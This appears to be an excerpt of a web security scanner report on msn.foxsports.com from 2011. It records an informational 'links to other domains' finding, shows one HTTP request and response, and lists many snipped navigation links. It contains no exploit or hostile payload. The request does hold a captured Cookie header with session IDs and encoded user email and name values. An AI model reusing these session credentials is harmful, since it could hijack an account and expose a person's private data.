<li class="">


                                                           <a href="http://www.foxsportssouthwest.com/" target="_blank" title="Oklahoma City">Oklahoma City</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportssouthwest.com/" target="_blank" title="Dallas">Dallas</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportsflorida.com/" target="_blank" title="Orlando">Orlando</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportsdetroit.com/" target="_blank" title="Detroit">Detroit</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportsarizona.com/" target="_blank" title="Phoenix">Phoenix</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportswisconsin.com/" target="_blank" title="Green Bay">Green Bay</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportscarolinas.com/" target="_blank" title="Raleigh">Raleigh</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportshouston.com/" target="_blank" title="Houston">Houston</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportssouthwest.com/" target="_blank" title="San Antonio">San Antonio</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportsmidwest.com/" target="_blank" title="Indianapolis">Indianapolis</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportsmidwest.com/" target="_blank" title="St. Louis">St. Louis</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportskansascity.com/" target="_blank" title="Kansas City">Kansas City</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportsflorida.com/" target="_blank" title="Tampa">Tampa</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.yardbarker.com/rumors" target="_blank" title="Rumors">Rumors</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.redbullairrace.com/cs/Satellite/en_air/Official-Red-Bull-Air-Race-Homepage/001238611393596" target="_blank" title="Air Racing">Air Racing</a>
...[SNIP]...
<li class="">


                                                           <a href="http://foxsports.seenon.com/?ecid=PRF-SM-500012&amp;PA=FoxSportNav2" target="_blank" title="Shop">Shop</a>
...[SNIP]...
<li class="msn-logo"><a href="http://msn.com" class="out-link msn sprite" title="go to MSN.com"><span>
...[SNIP]...
<li>
               <a href="http://entertainment.msn.com/" class="out-link" title="Entertainment">Entertainment</a>
...[SNIP]...
<li class="first" title="eEntertainment"><a href="http://wonderwall.msn.com/" title="Celebrities">Celebrities</a>
...[SNIP]...
<li class="" title="eEntertainment"><a href="http://thebubble.msn.com/ " title="Comedy">Comedy</a></li>
<li class="" title="eEntertainment"><a href="http://entertainment.msn.com/news/?ipp=15" title="Entertainment News ">Entertainment News </a>
...[SNIP]...
<li class="" title="eEntertainment"><a href="http://zone.msn.com/en-us/home" title="Games">Games</a></li>
<li class="" title="eEntertainment"><a href="http://movies.msn.com/" title="Movies">Movies</a></li>
<li class="" title="eEntertainment"><a href="http://music.msn.com/" title="Music">Music</a></li>
<li class="" title="eEntertainment"><a href="http://movies.msn.com/new-on-dvd/movies/" title="New on DVD">New on DVD</a>
...[SNIP]...
<li class="" title="eEntertainment"><a href="http://tv.msn.com/" title=" TV"> TV</a></li>
<li class="last" title="eEntertainment"><a href="http://entertainment.msn.com/video/?from=en-us_msnhp" title=" Video"> Video</a>
...[SNIP]...
<li>
   <a href="http://moneycentral.msn.com/home.asp" class="out-link" title="Money">Money</a>
...[SNIP]...
<li class="first" title="money"><a href="http://autos.msn.com/" title="Autos">Autos</a></li>
<li class="" title="money"><a href="http://www.msnbc.msn.com/id/3032072/ns/business" title="Business News">Business News</a>
...[SNIP]...
<li class="" title="money"><a href="http://msn.careerbuilder.com?siteid=cbmsn_home&sc_cmp1=JS_MSN_Home" title="Careers &amp; Jobs">Careers & Jobs</a>
...[SNIP]...
<li class="" title="money"><a href="http://moneycentral.msn.com/investor/home.aspx" title="Investing">Investing</a></li>
<li class="" title="money"><a href="http://moneycentral.msn.com/personal-finance/" title="Personal Finance">Personal Finance</a>
...[SNIP]...
<li class="" title="money"><a href="http://moneycentral.msn.com/detail/stock_quote" title="Quotes">Quotes</a></li>
<li class="" title="money"><a href="http://realestate.msn.com/" title="Real Estate &amp; Rentals">Real Estate & Rentals</a>
...[SNIP]...
<li class="last" title="money"><a href="http://articles.moneycentral.msn.com/video/default.aspx?from=en-us_msnhp" title="Video">Video</a>
...[SNIP]...
<li>
   <a href="http://lifestyle.msn.com/default.aspx" class="out-link" title="Lifestyle">Lifestyle</a>
...[SNIP]...
<li class="first" title="lifestyle"><a href="http://lifestyle.msn.com/your-look/" title="Beauty &amp; Fashion">Beauty & Fashion</a>
...[SNIP]...
<li class="" title="lifestyle"><a href="http://www.delish.com/" title=" Cooking"> Cooking</a></li>
<li class="" title="lifestyle"><a href="http://lifestyle.msn.com/your-home/" title="Decor &amp; Organizing">Decor & Organizing</a>
...[SNIP]...
<li class="" title="lifestyle"><a href="http://fitbie.msn.com" title="Fitbie">Fitbie</a></li>
<li class="" title="lifestyle"><a href="http://glo.msn.com/" title="Glo: For Her">Glo: For Her</a>
...[SNIP]...
<li class="" title="lifestyle"><a href="http://health.msn.com/" title="Health">Health</a></li>
<li class="" title="lifestyle"><a href="http://astrocenter.astrology.msn.com/msn/DeptHoroscope.aspx?When=0&Af=-1000&VS" title="Horoscopes">Horoscopes</a>
...[SNIP]...
<li class="" title="lifestyle"><a href="http://lifestyle.msn.com/relationships/" title="Love &amp; Relationships">Love & Relationships</a>
...[SNIP]...
<li class="" title="lifestyle"><a href="http://dating.msn.com/index.aspx?TrackingID=516163&BannerID=670269" title="Online Dating">Online Dating</a>
...[SNIP]...
<li class="" title="lifestyle"><a href="http://www.bing.com/travel/?cid=msn_nav_lifestyle&FORM=MSNNAV " title=" Travel"> Travel</a></li>
<li class="last" title="lifestyle"><a href="http://lifestyle.msn.com/your-look/video/?from=en-us_msnhp" title="Video">Video</a>
...[SNIP]...
<li id="msn-more">
   <a href="http://specials.msn.com/alphabet.aspx " class="msn-more" title="More">More</a>
...[SNIP]...
<li class="first" title="more"><a href="http://autos.msn.com/" title="Autos">Autos</a></li>
<li class="" title="more"><a href="http://www.bing.com/maps/default.aspx?FORM=MSNNAV" title="Maps &amp; Directions">Maps & Directions</a>
...[SNIP]...
<li class="" title="more"><a href="http://www.bing.com/videos/browse?from=en-us_msnhp" title="Video">Video</a></li>
<li class="" title="more"><a href="http://careers.msn.com/" title="Careers &amp; Jobs">Careers & Jobs</a>
...[SNIP]...
<li class="" title="more"><a href="http://my.msn.com/" title="My MSN">My MSN</a></li>
<li class="" title="more"><a href="http://local.msn.com/weather.aspx" title="Weather">Weather</a></li>
<li class="" title="more"><a href="http://insidemsn.wordpress.com" title="Corrections &amp; Clarifications">Corrections & Clarifications</a>
...[SNIP]...
<li class="" title="more"><a href="http://dating.msn.com/index.aspx?TrackingID=516163&BannerID=670268" title="Personals">Personals</a></li>
<li class="" title="more"><a href="http://msn.whitepages.com/" title="White Pages">White Pages</a>
...[SNIP]...
<li class="" title="more"><a href="http://www.delish.com/" title="Delish">Delish</a></li>
<li class="" title="more"><a href="http://moneycentral.msn.com/detail/stock_quote" title="Quotes">Quotes</a></li>
<li class="" title="more"><a href="http://wonderwall.msn.com/" title="Wonderwall">Wonderwall</a>
...[SNIP]...
<li class="" title="more"><a href="http://games.msn.com/" title="Games Preview">Games Preview</a>
...[SNIP]...
<li class="" title="more"><a href="http://realestate.msn.com/" title="Real Estate/Rentals">Real Estate/Rentals</a>
...[SNIP]...
<li class="" title="more"><a href="http://yellowpages.msn.com/" title="Yellow Pages">Yellow Pages</a>
...[SNIP]...
<li class="" title="more"><a href="http://astrocenter.astrology.msn.com" title="Horoscopes">Horoscopes</a>
...[SNIP]...
<li class="" title="more"><a href="http://www.bing.com/shopping?FORM=SHOPH2" title="Shopping">Shopping</a></li>
<li class="" title="more"><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB" title="Feedback">Feedback</a></li>
<li class="" title="more"><a href="http://local.msn.com/news.aspx" title="Local Edition">Local Edition</a>
...[SNIP]...
<li class="" title="more"><a href="http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV " title="Travel">Travel</a></li>
<li class="last" title="more"><a href="http://specials.msn.com/alphabet.aspx" title="Full MSN Index">Full MSN Index</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?FORM=FOXSP" class="bing-link">Bing</a>
...[SNIP]...
<h3><a title="FOX News" href="http://www.foxnews.com">FOX News</a>
...[SNIP]...
<h3><a title="News Corp." href="http://www.newscorp.com">News Corp.</a>
...[SNIP]...
<h3><a title="FOX" href="http://www.fox.com">FOX</a>
...[SNIP]...
<h3><a title="FOX Sports Supports" href="http://www.foxsportssupports.com">FOX Sports Supports</a>
...[SNIP]...
<h3><a title="FX" href="http://www.fxnetworks.com">FX</a>
...[SNIP]...
<h3><a title="Speed TV" href="http://www.speedtv.com">Speed TV</a>
...[SNIP]...
<h3><a title="NCAAFuel TV" href="http://www.fuel.tv">Fuel TV</a>
...[SNIP]...
<li>
                       <a href="http://www.foxcareers.com" title="Jobs">Jobs</a></li>
                   <li>
                       <a href="http://surveys2.researchresults.com/192/0030/1920030.htm?l=1" title="Join Our Opinion Panel">Join Our Opinion Panel</a>
...[SNIP]...
<li>
                       <a href="http://www.fox.com" title="FOX.com">FOX.com</a>
...[SNIP]...
<li>
                       <a href="http://www.foxnews.com" title="FOX News">FOX News</a>
...[SNIP]...
<li>
                       <a href="http://www.newscorp.com" title="News Corp">News Corp.</a>
...[SNIP]...
<li class="last">
                       <a href="http://www.foxsportssupports.com" title="FOX Sports Supports">FOX Sports Supports</a>
...[SNIP]...
<!-- Begin comScore Tag -->
<script language="javascript" src="http://b.scorecardresearch.com/beacon.js" type="text/javascript"></script>
...[SNIP]...
<noscript>
<img src="http://b.scorecardresearch.com/b?c1=2&c2=3000001&c3=&c4=&c5=&c6=&c15=&cv=1.3&cj=1" style="display:none" width="0" height="0" alt="" />
</noscript>
...[SNIP]...
<li><a target="_blank" href="http://go.microsoft.com/fwlink/?LinkId=74170" title="MSN Privacy">MSN Privacy</a>
...[SNIP]...
<li><a target="_blank" href="http://g.msn.com/0TO_/enus" title="Legal">Legal</a>
...[SNIP]...
<li><a target="_blank" href="http://advertising.msn.com/home/home.asp" title="Advertise">Advertise</a>
...[SNIP]...
<li><a target="_blank" href="http://rss.msn.com/" title="RSS">RSS</a>
...[SNIP]...
<li><a href="http://g.msn.com/AIPRIV/en-us">About our ads</a>
...[SNIP]...

10.8. http://msn.foxsports.com/collegefootball/story/Stanford-Cardinal-Andrew-Luck-to-come-back-for-another-season-010611

Summary

Severity:   Information
Confidence:   Certain
Host:   http://msn.foxsports.com
Path:   /collegefootball/story/Stanford-Cardinal-Andrew-Luck-to-come-back-for-another-season-010611

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /collegefootball/story/Stanford-Cardinal-Andrew-Luck-to-come-back-for-another-season-010611?8dd92 HTTP/1.1
Host: msn.foxsports.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: p11Kicks=7hfkkH5SN2ZnN488gKPP/GoXgOjDHl8RHLhCy3k7srsMr93kN8jrjbj3JgOI//CNZNiPHqQknRCMrKkIfl/N5YzzG16dog5fbW9kcCerWKOn5ROJwytkLTvZ4ryWzh+op2eMu5KhEdM/Jtq0Zg+GjMvR2anBaMaD; JSESSIONID=36BDC67738B7CE6D05539ED00BC46055; pALERTED=TRUE; pLMD="2011-01-08 00:30:34"; pENC_LNAME=/wgeX1XilBI=; glt_2_0mDflAmB2Uw-8uIvNcQDq7cV0-R4xz_-VK9rOU18T-Jc_50uceVqQUddE55Vkw25=LT1_wYGVkkgCTuOFWv1NpFDEqA%3D%3D; pRME=; UnicaNIODID=I7HpnSWrYC7-Ww6qltH; pUID=/k94ON71KoD/EYqOMDzIDg==; pENC_FNAME=Z1NVLTXWY1w=; _gig_mig=1; pEFSUID=/k94ON71KoD/EYqOMDzIDg==; pWHATIFSPORTS=0457nhtCFA3t1jis7tppnQYRYQCN6bXOVFUsoFcZ9DFjABAPjYGpxDMI976pCTsSgbHPbKqUUcAnnVgwH4WLWIw22dkifhqeveh7yGKiUBlCUggy9jwYGLPwO4g2/2TaHI5aWd5N/U6TrAz4oiqCRNr9VH15cFkq7VpqEGMPu4ZQoCd8JiazfhiCz19aE8Rr96avqbADey4zfxh7OCe3ARE45iIC+SoOO4zwo+2imw1wriyE/gxP7lCgJ3wmJrN+KsXLdMDxGLAaQBnEGrlvs9ds+BKO8cGA+0bSRs6mbTfXoJRF4HgeglEUizR3jzAIsqs4dxIjPEOir71y3OLemXi49kGaq/9vS2x2YKiW+hc=; NetInsightSessionID=1; _chartbeat2=oxy92bi233plhtq3; pExternalUser=; MUID=65AFF4B77A124856A6B4337A160FA285; pSTATS=oKMikaeXnadVXvheCgqv4qQGkvW5KkX7zWw6zIUiOwvlI5/OUGVvoWTXFJpBNWzQWVqOGmQZlvBCESj72haC4/OzY40LwV+YVr8L9ReeU4T3lYhQ6KEyPw/L10QuMbosYM5aXgrRZt1Yuvg4rb1Hi9aLTkInIxcA; pENC_EMAIL=s3nN+QCME4PqzMAvdLX63Yi++Emnqjmo; pFANTASYMOGULS=Jeypi2HA88QREMq/XrW5W6uaqRGCAMb+/M+ZzLvMJQSwaQW+febL4rpIIS10epmqgh/UVs1iVta0QPbQGbW+zEajyFiaJOKRs7miETBZyarJr1nY/ID/k8yxImY14QfLYp4Fx861z1PvhtTsTCo9nHhiJENEhksH9YgRXJ3iI3Kh8JguNeuK3N/eAzA+OMKstnepVvExJrs9ImjZI/XRI4JGRpFqkQEyAknAUiFBw280mu4h97153zkgZC3pprU0kHjSy1+3H8fa9C2mVIy0IJVI54TMoAqj8gf392S0Ozlcvob3U3YSfYf+fg80kwtJC6EWBz0qFcsMIR3IXQd90zjrRj+j6Il/bU36Pj1bI8A2Yml8HCRZs21N+j49WyPAFq4+ZdtreA4wf3lPSso/Mg==; pONESITE=wECUR3DVfAatOJ2BuE9nEIJ6iKhzw1J1DqpfIMqe8p8sMuelq5ptJXgFJkbkdTcy6v1ljz5hnRsOHtn/ORHunKGA9azvOKsjnlQl5+vANAphEHPO/TfA0gs0xGbwCkp2ZlHn80Wwjmy12/lA2yGCayQM/yxBkVKtmpMGzs5noanJHgnnsREscBsew5UDzLAY6u9XpfOLODoWeR/uovPQww==; 
pOPENSPORTS=KpKIL1M1Ag7Mu56rLIpMyH5Q0qTa5gwvuojCbFPQ5dB7rEdoiBUsOZlngCkKK0BShV4DtJ2fNgytwuhWqePhap9UWmxXoUrCerKsn/KNhssOwxf4JASIw7xwKkdd2uRnrbDV+1X03Zn6t+4KfItlF+qMzS6uOiVeU6ksPSqGW24b8A0Qgsz0zHhcvIriUhBbXXZQZk+4OsNItgO/YFsefQ0ZpEPEFd4z/5NzIdmRx4jPjxBJhyGQVqVwnQrzIpurXvOhNehzUUSKsb6SUNh4BjCSV5eyYXhZ;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 247816
Content-Type: text/html;charset=UTF-8
X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat-5.5
Cache-Control: max-age=21
Date: Sat, 08 Jan 2011 00:47:38 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
</script>


            <script type="text/javascript" src="http://Ads1.msn.com/library/dap.js"></script>
...[SNIP]...
http://static.foxsports.com/cgi-bin/merge?files=/fe/css/story/story_tools.css,/fe/css/story/storyPage.css,/fe/css/multimediaCP.css&contentType=text/css&v=3_149_37" rel="stylesheet" type="text/css"/>

<script type="text/javascript" src="http://images.video.msn.com/js/ch/Channels.js"></script>
<script type="text/javascript" language="javascript" src="http://images.video.msn.com/flash/script/embed.js"></script>
<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
<script type="text/javascript" src="http://cache-01.cleanprint.net/cp/ccg?divId=2275" name="cleanprintloader" ></script>
...[SNIP]...
<li>
<a href="http://www.speed.com/" title="Speed" class="speed" onclick="return true; fsAnalytics(this, {type: 'external', description: 'evergreennav - Speed'});" target="_blank">SPEED</a>
...[SNIP]...
<li>
<a href="http://www.scout.com/" title="Scout" class="scout" onclick="return true; fsAnalytics(this, {type: 'external', description: 'evergreennav - Scout'});" target="_blank">SCOUT</a>
...[SNIP]...
<li>
<a href="http://www.foxdeportes.com/" title="Deportes" class="deportes" onclick="return true; fsAnalytics(this, {type: 'external', description: 'evergreennav - Deportes'});" target="_blank">DEPORTES</a>
...[SNIP]...
<li>
<a href="http://www.whatifsports.com" title="What If" class="what-if" onclick="return true; fsAnalytics(this, {type: 'external', description: 'evergreennav - What If'});" target="_blank">WHAT IF</a>
...[SNIP]...
<li>
<a href="http://fsr-pr.clearchannel.com" title="FOX Sports Radio" class="radio" onclick="return true; fsAnalytics(this, {type: 'external', description: 'evergreennav - Fox Sports Radio'});" target="_blank">RADIO</a>
...[SNIP]...
<li>
<a href="http://foxsports.seenon.com/?ecid=PRF-SM-500003&PA=FoxSportNav " title="Shop" class="shop" onclick="return true; fsAnalytics(this, {type: 'external', description: 'evergreennav - Shop'});" target="_blank">SHOP</a>
...[SNIP]...
<li><a href="http://www.bing.com/search" id="wslink">Search the Web</a>
...[SNIP]...
class="">


                                                        <a href="http://foxsports.seenon.com/?v=foxsports-nfl" target="_blank" title="Shop">Shop</a>
...[SNIP]...
class="">


                                                        <a href="http://www.baseballamerica.com" target="_blank" title="Baseball America">Baseball America</a>
...[SNIP]...
class="">


                                                        <a href="http://foxsports.seenon.com/?v=fox-sports_mlb" target="_blank" title="Shop">Shop</a>
...[SNIP]...
class="">


                                                        <a href="http://www.speedtv.com" target="_blank" title="SPEED">SPEED</a>
...[SNIP]...
class="">


                                                        <a href="http://foxsports.seenon.com/?v=fox-sports_nascar" target="_blank" title="Shop">Shop</a>
...[SNIP]...
class="">


                                                        <a href="http://foxsports.seenon.com/?v=fox-sports_nba" target="_blank" title="Shop">Shop</a>
...[SNIP]...
class="">


                                                        <a href="http://foxsports.seenon.com/?v=fox-sports_nhl" target="_blank" title="Shop">Shop</a>
...[SNIP]...
class="">


                                                        <a href="http://foxsports.seenon.com/?v=fox-sports_ncaa" target="_blank" title="Shop">Shop</a>
...[SNIP]...
class="">


                                                        <a href="http://foxsports.seenon.com/?v=fox-sports_ncaa" target="_blank" title="Shop">Shop</a>
...[SNIP]...
<li class="">

   
                                    <a href="http://foxsoccer.tv" title="FoxSoccer.tv">FoxSoccer.tv</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://foxsports.seenon.com/" target="_blank" title="Shop">Shop</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://www.golfweek.com" target="_blank" title="Golfweek">Golfweek</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://insidefights.com/" target="_blank" title="Inside Fights">Inside Fights</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://www.heavy.com/mma/ " target="_blank" title="HeavyMMA">HeavyMMA</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://www.thefightnetwork.com" target="_blank" title="Fight Network">Fight Network</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://foxsports.seenon.com/" target="_blank" title="Shop">Shop</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://www.redbullairrace.com/cs/Satellite/en_air/Official-Red-Bull-Air-Race-Homepage/001238611393596" target="_blank" title="Air Racing">Air Racing</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://foxsports.seenon.com/" target="_blank" title="Shop">Shop</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://foxsports.seenon.com/" target="_blank" title="Shop">Shop</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://insidefights.com/" target="_blank" title="Inside Fights">Inside Fights</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://www.heavy.com/mma/ " target="_blank" title="HeavyMMA">HeavyMMA</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://www.thefightnetwork.com" target="_blank" title="Fight Network">Fight Network</a>
...[SNIP]...
p-down-off">

   
                                                                    <a href="http://foxsports.seenon.com/" target="_blank" title="Shop">Shop</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://foxsports.seenon.com/" target="_blank" title="Shop">Shop</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://www.speedtv.com" target="_blank" title="SPEED">SPEED</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://foxsports.seenon.com/" target="_blank" title="Shop">Shop</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://www.speedtv.com" target="_blank" title="SPEED">SPEED</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://foxsports.seenon.com/" target="_blank" title="Shop">Shop</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://www.tvg.com/special/FoxSportsJumpPage_final.htm" target="_blank" title="Odds/Results">Odds/Results</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://www.tvg.com/special/FoxSportsJumpPage_final.htm" target="_blank" title="TVG">TVG</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://www.racereplays.com/foxsports/index.cfm?start=ws_foxsports.com_navbar" target="_blank" title="Race Replays">Race Replays</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://www.redbullairrace.com/cs/Satellite/en_air/Official-Red-Bull-Air-Race-Homepage/001238611393596" target="_blank" title="Air Race Series">Air Race Series</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportswest.com/" target="_blank" title="Anaheim ">Anaheim </a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportswest.com/" target="_blank" title="Los Angeles">Los Angeles</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportssouth.com/" target="_blank" title="Atlanta">Atlanta</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportstennessee.com/" target="_blank" title="Memphis">Memphis</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.nesn.com/" target="_blank" title="Boston">Boston</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportsflorida.com/" target="_blank" title="Miami">Miami</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportscarolinas.com/" target="_blank" title="Charlotte">Charlotte</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportswisconsin.com/" target="_blank" title="Milwaukee">Milwaukee</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportsohio.com/" target="_blank" title="Cincinnati">Cincinnati</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportsnorth.com/" target="_blank" title="Minneapolis">Minneapolis</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportsohio.com/" target="_blank" title="Cleveland">Cleveland</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportstennessee.com/" target="_blank" title="Nashville">Nashville</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportsohio.com/" target="_blank" title="Columbus">Columbus</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportssouthwest.com/" target="_blank" title="Oklahoma City">Oklahoma City</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportssouthwest.com/" target="_blank" title="Dallas">Dallas</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportsflorida.com/" target="_blank" title="Orlando">Orlando</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportsdetroit.com/" target="_blank" title="Detroit">Detroit</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportsarizona.com/" target="_blank" title="Phoenix">Phoenix</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportswisconsin.com/" target="_blank" title="Green Bay">Green Bay</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportscarolinas.com/" target="_blank" title="Raleigh">Raleigh</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportshouston.com/" target="_blank" title="Houston">Houston</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportssouthwest.com/" target="_blank" title="San Antonio">San Antonio</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportsmidwest.com/" target="_blank" title="Indianapolis">Indianapolis</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportsmidwest.com/" target="_blank" title="St. Louis">St. Louis</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportskansascity.com/" target="_blank" title="Kansas City">Kansas City</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.foxsportsflorida.com/" target="_blank" title="Tampa">Tampa</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.yardbarker.com/rumors" target="_blank" title="Rumors">Rumors</a>
...[SNIP]...
<li class="">


                                                           <a href="http://www.redbullairrace.com/cs/Satellite/en_air/Official-Red-Bull-Air-Race-Homepage/001238611393596" target="_blank" title="Air Racing">Air Racing</a>
...[SNIP]...
<li class="">


                                                           <a href="http://foxsports.seenon.com/?ecid=PRF-SM-500012&amp;PA=FoxSportNav2" target="_blank" title="Shop">Shop</a>
...[SNIP]...
<li class="msn-logo"><a href="http://msn.com" class="out-link msn sprite" title="go to MSN.com"><span>
...[SNIP]...
<li>
               <a href="http://entertainment.msn.com/" class="out-link" title="Entertainment">Entertainment</a>
...[SNIP]...
<li class="first" title="eEntertainment"><a href="http://wonderwall.msn.com/" title="Celebrities">Celebrities</a>
...[SNIP]...
<li class="" title="eEntertainment"><a href="http://thebubble.msn.com/ " title="Comedy">Comedy</a></li>
<li class="" title="eEntertainment"><a href="http://entertainment.msn.com/news/?ipp=15" title="Entertainment News ">Entertainment News </a>
...[SNIP]...
<li class="" title="eEntertainment"><a href="http://zone.msn.com/en-us/home" title="Games">Games</a></li>
<li class="" title="eEntertainment"><a href="http://movies.msn.com/" title="Movies">Movies</a></li>
<li class="" title="eEntertainment"><a href="http://music.msn.com/" title="Music">Music</a></li>
<li class="" title="eEntertainment"><a href="http://movies.msn.com/new-on-dvd/movies/" title="New on DVD">New on DVD</a>
...[SNIP]...
<li class="" title="eEntertainment"><a href="http://tv.msn.com/" title=" TV"> TV</a></li>
<li class="last" title="eEntertainment"><a href="http://entertainment.msn.com/video/?from=en-us_msnhp" title=" Video"> Video</a>
...[SNIP]...
<li>
   <a href="http://moneycentral.msn.com/home.asp" class="out-link" title="Money">Money</a>
...[SNIP]...
<li class="first" title="money"><a href="http://autos.msn.com/" title="Autos">Autos</a></li>
<li class="" title="money"><a href="http://www.msnbc.msn.com/id/3032072/ns/business" title="Business News">Business News</a>
...[SNIP]...
<li class="" title="money"><a href="http://msn.careerbuilder.com?siteid=cbmsn_home&sc_cmp1=JS_MSN_Home" title="Careers &amp; Jobs">Careers & Jobs</a>
...[SNIP]...
<li class="" title="money"><a href="http://moneycentral.msn.com/investor/home.aspx" title="Investing">Investing</a></li>
<li class="" title="money"><a href="http://moneycentral.msn.com/personal-finance/" title="Personal Finance">Personal Finance</a>
...[SNIP]...
<li class="" title="money"><a href="http://moneycentral.msn.com/detail/stock_quote" title="Quotes">Quotes</a></li>
<li class="" title="money"><a href="http://realestate.msn.com/" title="Real Estate &amp; Rentals">Real Estate & Rentals</a>
...[SNIP]...
<li class="last" title="money"><a href="http://articles.moneycentral.msn.com/video/default.aspx?from=en-us_msnhp" title="Video">Video</a>
...[SNIP]...
<li>
   <a href="http://lifestyle.msn.com/default.aspx" class="out-link" title="Lifestyle">Lifestyle</a>
...[SNIP]...
<li class="first" title="lifestyle"><a href="http://lifestyle.msn.com/your-look/" title="Beauty &amp; Fashion">Beauty & Fashion</a>
...[SNIP]...
<li class="" title="lifestyle"><a href="http://www.delish.com/" title=" Cooking"> Cooking</a></li>
<li class="" title="lifestyle"><a href="http://lifestyle.msn.com/your-home/" title="Decor &amp; Organizing">Decor & Organizing</a>
...[SNIP]...
<li class="" title="lifestyle"><a href="http://fitbie.msn.com" title="Fitbie">Fitbie</a></li>
<li class="" title="lifestyle"><a href="http://glo.msn.com/" title="Glo: For Her">Glo: For Her</a>
...[SNIP]...
<li class="" title="lifestyle"><a href="http://health.msn.com/" title="Health">Health</a></li>
<li class="" title="lifestyle"><a href="http://astrocenter.astrology.msn.com/msn/DeptHoroscope.aspx?When=0&Af=-1000&VS" title="Horoscopes">Horoscopes</a>
...[SNIP]...
<li class="" title="lifestyle"><a href="http://lifestyle.msn.com/relationships/" title="Love &amp; Relationships">Love & Relationships</a>
...[SNIP]...
<li class="" title="lifestyle"><a href="http://dating.msn.com/index.aspx?TrackingID=516163&BannerID=670269" title="Online Dating">Online Dating</a>
...[SNIP]...
<li class="" title="lifestyle"><a href="http://www.bing.com/travel/?cid=msn_nav_lifestyle&FORM=MSNNAV " title=" Travel"> Travel</a></li>
<li class="last" title="lifestyle"><a href="http://lifestyle.msn.com/your-look/video/?from=en-us_msnhp" title="Video">Video</a>
...[SNIP]...
<li id="msn-more">
   <a href="http://specials.msn.com/alphabet.aspx " class="msn-more" title="More">More</a>
...[SNIP]...
<li class="first" title="more"><a href="http://autos.msn.com/" title="Autos">Autos</a></li>
<li class="" title="more"><a href="http://www.bing.com/maps/default.aspx?FORM=MSNNAV" title="Maps &amp; Directions">Maps & Directions</a>
...[SNIP]...
<li class="" title="more"><a href="http://www.bing.com/videos/browse?from=en-us_msnhp" title="Video">Video</a></li>
<li class="" title="more"><a href="http://careers.msn.com/" title="Careers &amp; Jobs">Careers & Jobs</a>
